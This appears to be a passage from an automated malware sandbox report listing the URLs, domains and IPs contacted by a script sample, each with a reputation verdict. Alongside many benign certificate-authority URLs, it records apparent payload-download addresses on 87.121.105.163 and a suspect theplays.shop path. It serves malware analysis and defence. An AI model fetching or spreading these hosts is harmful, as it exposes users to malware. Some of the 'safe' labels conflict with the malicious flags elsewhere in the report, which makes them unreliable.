        http://ocsp.suscerte.gob.ve00%URL Reputationsafe
        http://crl.microsoft0%URL Reputationsafe
        http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
        http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
        http://www.chambersign.org10%URL Reputationsafe
        http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
        http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
        http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
        http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
        http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
        http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
        http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
        http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
        http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
        http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
        http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
        http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
        http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
        http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
        http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
        http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
        http://87.121.105.163/Boldklubbens.pczP0%Avira URL Cloudsafe
        http://www.sk.ee/cps/00%URL Reputationsafe
        http://www.theplays.shop/gnbc/0%Avira URL Cloudsafe
        http://crl.postsignum.cz/crl/psrootqca4.crl020%URL Reputationsafe
        http://policy.camerfirma.com00%URL Reputationsafe
        http://www.ssc.lt/cps030%URL Reputationsafe
        http://www.ssc.lt/cps030%URL Reputationsafe
        http://ocsp.pki.gva.es00%URL Reputationsafe
        http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
        http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://ca.mtin.es/mtin/ocsp00%URL Reputationsafe
        http://ca.mtin.es/mtin/ocsp00%URL Reputationsafe
        http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
        http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf00%URL Reputationsafe
        http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%URL Reputationsafe
        http://www.defence.gov.au/pki00%Avira URL Cloudsafe
        http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
        http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        http://www.globaltrust.info0=0%Avira URL Cloudsafe
        https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
        http://www.dnie.es/dpc00%URL Reputationsafe
        http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
        http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://ca.mtin.es/mtin/DPCyPoliticas00%URL Reputationsafe
        https://repository.tsp.zetes.com00%URL Reputationsafe
        https://repository.tsp.zetes.com00%URL Reputationsafe
        http://www.globaltrust.info00%URL Reputationsafe
        http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
        http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
        https://www.catcert.net/verarrel0%URL Reputationsafe
        http://www.disig.sk/ca0f0%URL Reputationsafe
        http://www.sk.ee/juur/crl/00%URL Reputationsafe
        http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
        http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
        http://certs.oati.net/repository/OATICA2.crl00%URL Reputationsafe
        http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
        http://www.quovadis.bm00%URL Reputationsafe
        http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
        http://87.121.105.1630%Avira URL Cloudsafe
        http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
        http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
        http://www.accv.es000%URL Reputationsafe
        http://www.accv.es000%URL Reputationsafe
        http://www.pkioverheid.nl/policies/root-policy-G200%URL Reputationsafe
        http://www.theplays.shop/gnbc/0%VirustotalBrowse
        https://www.netlock.net/docs0%URL Reputationsafe
        http://www.theplays.shop/gnbc/?qRm=CFA+HkVxdb5EmOTiyKOWRwF+pLrZo+HX//sAjaoe71zU1jru2C8H4zHuCGW9CrkOmabuxLOltM6mSwZ40cUWhJKDDEbSgCXb2jOP4Eqmg9UuBFGRNSISgVk=&ALLPg=JbKtchOp7P4H8n80%Avira URL Cloudsafe
        http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
        http://ocsp.ncdc.gov.sa00%URL Reputationsafe
        http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl00%URL Reputationsafe
        http://87.121.105.163/fBizb192.bin0%Avira URL Cloudsafe
        http://crl2.postsignum.cz/crl/psrootqca4.crl010%URL Reputationsafe
        http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
        http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%URL Reputationsafe
        http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;0%URL Reputationsafe
        https://repository.luxtrust.lu00%URL Reputationsafe
        http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        http://www.acabogacia.org00%URL Reputationsafe
        http://www.uce.gub.uy/acrn/acrn.crl00%URL Reputationsafe
        http://www.uce.gub.uy/acrn/acrn.crl00%URL Reputationsafe
        https://d.symc00%Avira URL Cloudsafe
        http://87.121.105.16318%VirustotalBrowse
        http://www.defence.gov.au/pki00%VirustotalBrowse
        http://87.121.105.163/fBizb192.bin18%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.oyoing.com
        127.0.0.1
        truefalseunknown
        www.tyaer.com
        47.91.88.207
        truetrueunknown
        www.theplays.shop
        172.67.152.117
        truetrueunknown
        www.megabet303.lol
        unknown
        unknowntrueunknown
        NameMaliciousAntivirus DetectionReputation
        http://www.theplays.shop/gnbc/true
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.theplays.shop/gnbc/?qRm=CFA+HkVxdb5EmOTiyKOWRwF+pLrZo+HX//sAjaoe71zU1jru2C8H4zHuCGW9CrkOmabuxLOltM6mSwZ40cUWhJKDDEbSgCXb2jOP4Eqmg9UuBFGRNSISgVk=&ALLPg=JbKtchOp7P4H8n8true
        • Avira URL Cloud: safe
        unknown
        http://87.121.105.163/fBizb192.binfalse
        • 18%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0wscript.exe, 00000000.00000003.1653465992.00000279AEF14000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.e-me.lv/repository0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652809745.00000279AF07C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.acabogacia.org/doc0wscript.exe, 00000000.00000003.1653193135.00000279AEF25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://crl.chambersign.org/chambersroot.crl0wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://ocsp.suscerte.gob.ve0wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://crl.microsoftpowershell.exe, 00000004.00000002.2007607126.0000000007AA0000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.postsignum.cz/crl/psrootqca2.crl02wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://crl.dhimyotis.com/certignarootca.crl0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0wscript.exe, 00000000.00000003.1653193135.00000279AEF25000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://www.chambersign.org1wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.pkioverheid.nl/policies/root-policy0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://87.121.105.163/Boldklubbens.pczPpowershell.exe, 00000001.00000002.2117543638.0000024A80224000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://repository.swisssign.com/0wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://www.suscerte.gob.ve/lcr0#wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://crl.ssc.lt/root-c/cacrl.crl0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://postsignum.ttc.cz/crl/psrootqca2.crl0wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlwscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://ca.disig.sk/ca/crl/ca_disig.crl0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.certplus.com/CRL/class3P.crl0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.suscerte.gob.ve/dpc0wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.certeurope.fr/reference/root2.crl0wscript.exe, 00000000.00000003.1653465992.00000279AEF14000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://www.certplus.com/CRL/class2.crl0wscript.exe, 00000000.00000003.1652963346.00000279AEF6F000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.disig.sk/ca/crl/ca_disig.crl0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.defence.gov.au/pki0wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2218474708.0000024A90076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2003727475.000000000605E000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.sk.ee/cps/0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.globaltrust.info0=wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://www.anf.eswscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2117543638.0000024A80001000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://crl.postsignum.cz/crl/psrootqca4.crl02wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://pki.registradores.org/normativa/index.htm0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://policy.camerfirma.com0wscript.exe, 00000000.00000003.1652963346.00000279AEF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.ssc.lt/cps03wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ocsp.pki.gva.es0wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.anf.es/es/address-direccion.htmlwscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.anf.es/address/)1(0&wscript.exe, 00000000.00000003.1662983945.00000279AEEB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2000284208.0000000005145000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            http://ca.mtin.es/mtin/ocsp0wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.ssc.lt/root-b/cacrl.crl0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2000284208.0000000005145000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://web.ncdc.gov.sa/crl/nrcacomb1.crl0wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.certicamara.com/dpc/0Zwscript.exe, 00000000.00000003.1653111726.00000279AEF31000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0Gwscript.exe, 00000000.00000003.1653057324.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653014801.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://go.micropowershell.exe, 00000001.00000002.2117543638.0000024A813F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://wwww.certigna.fr/autorites/0mwscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.dnie.es/dpc0wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.2003727475.000000000605E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://87.121.105.163powershell.exe, 00000001.00000002.2117543638.0000024A8040B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2117543638.0000024A81E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 18%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://ca.mtin.es/mtin/DPCyPoliticas0wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.anf.es/AC/ANFServerCA.crl0wscript.exe, 00000000.00000003.1653193135.00000279AEF2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://repository.tsp.zetes.com0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.globaltrust.info0wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://certificates.starfieldtech.com/repository/1604wscript.exe, 00000000.00000003.1652928103.00000279AEF7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://acedicom.edicomgroup.com/doc0wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.certplus.com/CRL/class3TS.crl0wscript.exe, 00000000.00000003.1653221177.00000279AEF1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2000284208.0000000005145000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://crl.anf.es/AC/ANFServerCA.crl0wscript.exe, 00000000.00000003.1653193135.00000279AEF2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.certeurope.fr/reference/pc-root2.pdf0wscript.exe, 00000000.00000003.1653465992.00000279AEF14000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://ac.economia.gob.mx/last.crl0Gwscript.exe, 00000000.00000003.1653614404.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652928103.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653665451.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.catcert.net/verarrelwscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.disig.sk/ca0fwscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.e-szigno.hu/RootCA.crlwscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.sk.ee/juur/crl/0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.chambersign.org/chambersignroot.crl0wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.xrampsecurity.com/XGCA.crl0wscript.exe, 00000000.00000003.1653111726.00000279AEF31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://certs.oati.net/repository/OATICA2.crl0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.oces.trust2408.com/oces.crl0wscript.exe, 00000000.00000003.1652928103.00000279AEF7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.quovadis.bm0wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.ssc.lt/root-a/cacrl.crl0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://certs.oaticerts.com/repository/OATICA2.crlwscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://certs.oati.net/repository/OATICA2.crt0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.accv.es00wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.pkioverheid.nl/policies/root-policy-G20wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.netlock.net/docswscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.e-trust.be/CPS/QNcertswscript.exe, 00000000.00000003.1652963346.00000279AEF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652809745.00000279AF07C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://ocsp.ncdc.gov.sa0wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl2.postsignum.cz/crl/psrootqca4.crl01wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://web.ncdc.gov.sa/crl/nrcaparta1.crlwscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.datev.de/zertifikat-policy-int0wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://d.symc0wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://repository.luxtrust.lu0wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://cps.chambersign.org/cps/chambersroot.html0wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.2003727475.000000000605E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.acabogacia.org0wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.firmaprofesional.com/cps0wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.uce.gub.uy/acrn/acrn.crl0wscript.exe, 00000000.00000003.1653057324.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653014801.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      87.121.105.163
                                                      unknownBulgaria
                                                      43561NET1-ASBGfalse
                                                      172.67.152.117
